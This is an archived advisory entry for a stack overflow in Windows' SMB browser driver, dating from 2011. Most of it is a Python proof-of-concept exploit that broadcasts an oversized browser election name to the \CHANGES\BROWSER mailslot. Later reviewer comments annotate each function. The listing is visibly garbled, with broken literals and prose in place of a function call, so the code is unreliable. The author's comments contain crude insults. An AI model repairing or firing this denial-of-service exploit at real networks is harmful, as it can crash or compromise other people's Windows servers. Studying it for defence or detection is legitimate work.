Windows Server 2003 AD pre-authoritative stack overflow vulnerability warning - the black bar safety net

2011-02-17T00:00:00
ID MYHACK58:62201129205
Type myhack58
Reporter 佚名
Modified 2011-02-17T00:00:00

Description

###############################################################################

Mrxsmb.sys, around BowserWriteErrorLog+0x175, while trying to copy 1go from ESI to EDI ...

Code will look something like this:

if ((Len + 1) * sizeof(WCHAR)) > TotalBufferSize) { Len = TotalSize/sizeof(WCHAR) - 1; }

The `- 1` causes Len to wrap to 0xFFFFFFFF when TotalSize/sizeof(WCHAR) evaluates to 0.

Feel free to reuse this code without restrictions and ask Kingcope-Fag to

perform his FTP FU on SMB, he might have more luck than MS. " import socket,sys,struct from socket import *

# NOTE(review): archived listing, kept byte-for-byte. The text is extraction-garbled
# throughout (spaces inside numeric literals and method calls, a quote dropped from
# join() calls, an identifier replaced by prose) and uses Python 2 print statements,
# so it does not run as shown.
# CLI: argv[1] local IP, argv[2] broadcast address, argv[3]/argv[4] NetBIOS source
# and destination names (uppercased); the usage text documents the expected order.
if len(sys. argv)<=4: sys. exit("""usage: python sploit.py UR-IP BCAST IP-NBT-NAME in AD-NAME example: python sploit.py 192.168.1.10 192.168.1.255 OhYeah AD-NETBIOS-NAME""")

ourip = sys. argv[1] host = sys. argv[2] srcname = sys. argv[3]. upper() dstname = sys. argv[4]. upper()

# 3-byte NetBIOS service-suffix strings; encodename() appends one of these to each
# encoded name (they reach it through sockbroad() -> trans2mailslot()).
ELEC = "\x42\x4f\x00" WREDIR = "\x41\x41\x00"

# encodename(nbt, service) -> str: NetBIOS first-level name encoding (RFC 1001 style):
# a leading '\x20', then each byte of `nbt` as two letters (high nibble + 'A',
# low nibble + 'A'), padding with repeated "\x43\x41" out to a fixed name width,
# then the 3-byte `service` suffix. In this archived listing the padding-count
# literal is garbled and the join() empty-string literal has lost a quote, so the
# line does not parse as shown; it is kept verbatim.
def encodename(nbt,service): final = '\x20'+". join([chr((ord(i)>>4) + ord('A'))+chr((ord(i)&0xF) + ord('A')) for i in nbt])+((1 5 - len(nbt)) * str('\x43\x41'))+service return final

# lengthlittle(packet, addnum) -> str: len(packet) + addnum packed as a 32-bit
# little-endian int, truncated to its first two bytes (the low 16 bits, LE).
def lengthlittle(packet,addnum): length = struct. pack("<i", len(packet)+addnum)[0:2] return length

# lengthbig(packet, addnum) -> str: len(packet) + addnum packed as a 32-bit
# big-endian int, keeping bytes [2:4] (the low 16 bits, BE). trans2mailslot()
# uses it to patch the datagram length field.
def lengthbig(packet,addnum): length = struct. pack(">i", len(packet)+addnum)[2:4] return length

# election(srcname) -> str: builds the browser "election" frame body: fixed
# leading bytes, then `srcname` terminated by a NUL. Nothing bounds `srcname`;
# the call at the bottom of the file passes a long run of "A" — presumably the
# oversized name the advisory text above attributes the overflow to (inferred;
# the advisory does not say so explicitly). The author's per-field comments
# ("Be the boss or die", "Up time", "Null, like SDLC") originally sat on separate
# lines; collapsed onto one line here, the first '#' swallows the rest of the
# statement, so this line does not reproduce the intended body.
def election(srcname): elec = "\x08" elec+= "\x09" #Be the boss or die elec+= "\xa8\x0f\x01\x20" #Be the boss or die elec+= "\x1b\xe9\xa5\x00" #Up time elec+= "\x00\x00\x00\x00" #Null, like SDLC elec+= srcname+"\x00" return elec

# smbheaderudp(op="\x25") -> str: a 32-byte SMB header: the "\xffSMB" magic,
# the command byte `op`, and every remaining field zero-filled.
def smbheaderudp(op="\x25"): smbheader= "\xff\x53\x4d\x42" smbheader+= op smbheader+= "\x00" smbheader+= "\x00" smbheader+= "\x00\x00" smbheader+= "\x00" smbheader+= "\x00\x00" smbheader+= "\x00\x00" smbheader+= "\x00\x00\x00\x00\x00\x00\x00\x00" smbheader+= "\x00\x00" smbheader+= "\x00\x00" smbheader+= "\x00\x00" smbheader+= "\x00\x00" smbheader+= "\x00\x00" return smbheader

# trans2mailslot(...) -> str: assembles one NetBIOS datagram carrying an SMB
# transaction to a mailslot. Layout, in order: a datagram header ("\x11", "\x02",
# `tid`, a converted form of `ip`, fixed bytes), the two encodename()-encoded names
# (sname+srcservice, dname+dstservice), the header from smbheaderudp("\x25"), the
# transaction fields (several lengths computed with lengthlittle()), the mailslot
# header ending in `namepipe` + NUL, and finally `pbrowser` as the payload. A 2-byte
# length from lengthbig() is then patched into the assembled datagram. Notes:
# - `ip=ourip` is bound at definition time from the module global.
# - `andoffset` is computed but never used.
# - The call that converts `ip` has been replaced by prose ("cannot be stored
#   correctly") in this archived listing, the patch-slice indices are garbled and
#   the join() literal has lost a quote, so the line does not parse as shown; it
#   is kept verbatim.
def trans2mailslot(tid="\x80\x0b",ip=ourip,sname="LOVE-SDL",dname="SRD-LOVE",namepipe="\CHANGES\BROWSE",srcservice="\x41\x41\x00",dstservice="\x41\x41\x00",pbrowser=""): packetbrowser = pbrowser packetmailslot = "\x01\x00" packetmailslot+= "\x00\x00" packetmailslot+= "\x02\x00" packetmailslot+= lengthlittle(packetbrowser+namepipe,4) packetmailslot+= namepipe +"\x00" packetdatagram = "\x11" packetdatagram+= "\x02" packetdatagram+= tid packetdatagram+= cannot be stored correctly(ip) packetdatagram+= "\x00\x8a" packetdatagram+= "\x00\xa7" packetdatagram+= "\x00\x00" packetdatagramname = encodename(sname,srcservice) packetdatagramname+= encodename(dname,dstservice) smbheader= smbheaderudp("\x25") packetrans2 = "\x11" packetrans2+= "\x00\x00" packetrans2+= lengthlittle(packetbrowser,0) packetrans2+= "\x00\x00" packetrans2+= "\x00\x00" packetrans2+= "\x00" packetrans2+= "\x00" packetrans2+= "\x00\x00" packetrans2+= "\xe8\x03\x00\x00" packetrans2+= "\x00\x00" packetrans2+= "\x00\x00" packetrans2+= "\x00\x00" packetrans2+= lengthlittle(packetbrowser,0) packetrans2+= lengthlittle(smbheader+packetrans2+packetmailslot,4) packetrans2+= "\x03" packetrans2+= "\x00" andoffset = lengthlittle(smbheader+packetrans2+packetmailslot,2) lengthcalc = packetdatagramname+smbheader+packetrans2+packetmailslot+packetbrowser packetfinal = packetdatagram+packetdatagramname+smbheader+packetrans2+packetmailslot+packetbrowser packetotalength = list(packetfinal) packetotalength[1 0:1 2] = lengthbig(lengthcalc,0) packetrans2final = ". join(packetotalength) return packetrans2final

# sockbroad(host, sourceservice, destservice, packet): opens a UDP socket with
# SO_BROADCAST, binds all interfaces on a port whose literal is garbled here,
# builds the datagram with trans2mailslot() (mailslot name "\CHANGES\BROWSER";
# ip/sname/dname are taken from the module globals ourip/srcname/dstname rather
# than from parameters) and sends it to `host`. `sourceservice`/`destservice`
# become the encoded names' service suffixes. `packsmbheader` is built but never
# used. The bare `except:` prints sys.exc_info() (Python 2 print statement) and
# re-raises, so no error is swallowed.
def sockbroad(host,sourceservice,destservice,packet): s = socket(AF_INET,SOCK_DGRAM) s. setsockopt(SOL_SOCKET, SO_BROADCAST,1) s. bind(('0.0.0.0', 1 3 8)) try: packsmbheader = smbheaderudp("\x25") buffer0 = trans2mailslot(tid="\x80\x22",ip=ourip,sname=srcname,dname=dstname,namepipe="\CHANGES\BROWSER",srcservice=sourceservice, dstservice=destservice, pbrowser=packet) s. sendto(buffer0,(host,1 3 8)) except: print "expected SDL error:", sys. exc_info()[0] raise

# Entry point: a single broadcast of an election frame whose name field is a long
# run of "A" (the count literal is garbled, as is the range in the author's
# comment). On this collapsed line the '#' also swallows the trailing Python 2
# print statement. From a defender's view the wire observable is a broadcast
# NetBIOS datagram to the "\CHANGES\BROWSER" mailslot carrying an election frame
# with an abnormally long server name.
sockbroad(host,WREDIR,ELEC,election("A" * 4 1 0)) # -> Zing it! (between ~6 0->4 1 0) print "Happy St-Valentine Bitches\nMSFT found that one loooooooong time ago...."